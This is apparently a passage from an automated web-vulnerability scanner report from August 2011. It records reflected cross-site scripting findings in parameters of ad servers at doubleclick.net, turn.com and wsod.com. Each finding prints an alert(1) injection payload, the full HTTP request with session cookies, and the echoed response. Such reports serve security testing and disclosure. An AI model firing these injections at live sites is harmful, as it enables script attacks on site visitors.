1.10. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97035"-alert(1)-"646d7b63f13 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158997035"-alert(1)-"646d7b63f13&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:50:16 GMT
Expires: Mon, 15 Aug 2011 18:55:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b64/17/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158997035"-alert(1)-"646d7b63f13&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con2");
var fscUrl = url;
var fsc
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ad46"-alert(1)-"bce6630befc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click4ad46"-alert(1)-"bce6630befc&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36861
Date: Mon, 15 Aug 2011 18:49:39 GMT
Expires: Mon, 15 Aug 2011 18:54:39 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
lickThroughUrl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/x%3B242851043%3B5-0%3B0%3B64882146%3B3454-728/90%3B41171554/41189341/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click4ad46"-alert(1)-"bce6630befc&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1300214506669.uniqueId;
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac95'-alert(1)-'5ea353315f0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=clickdac95'-alert(1)-'5ea353315f0&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6169
Date: Mon, 15 Aug 2011 18:49:43 GMT
Expires: Mon, 15 Aug 2011 18:54:43 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue Mar 08 09:18:11 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
\"_blank\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/p%3B242851043%3B3-0%3B0%3B64882146%3B3454-728/90%3B41060957/41078744/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=clickdac95'-alert(1)-'5ea353315f0&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/innovation/us/leadership/response/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20110307&cr=cnnmoney&ct=USBRB301&cn=caple
...[SNIP]...

1.13. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55a0"><script>alert(1)</script>d792c073698 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=d55a0"><script>alert(1)</script>d792c073698&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5iQ-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:14 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:14 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=3457000099704880491&fpid=d55a0"><script>alert(1)</script>d792c073698&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.14. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c88db"><script>alert(1)</script>d46465e9bd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=c88db"><script>alert(1)</script>d46465e9bd4 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5iQ-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:15 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=2712780261281906027&fpid=1&nu=n&t=&sp=c88db"><script>alert(1)</script>d46465e9bd4&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af749</script><script>alert(1)</script>3d1b80b715e was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790af749</script><script>alert(1)</script>3d1b80b715e&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
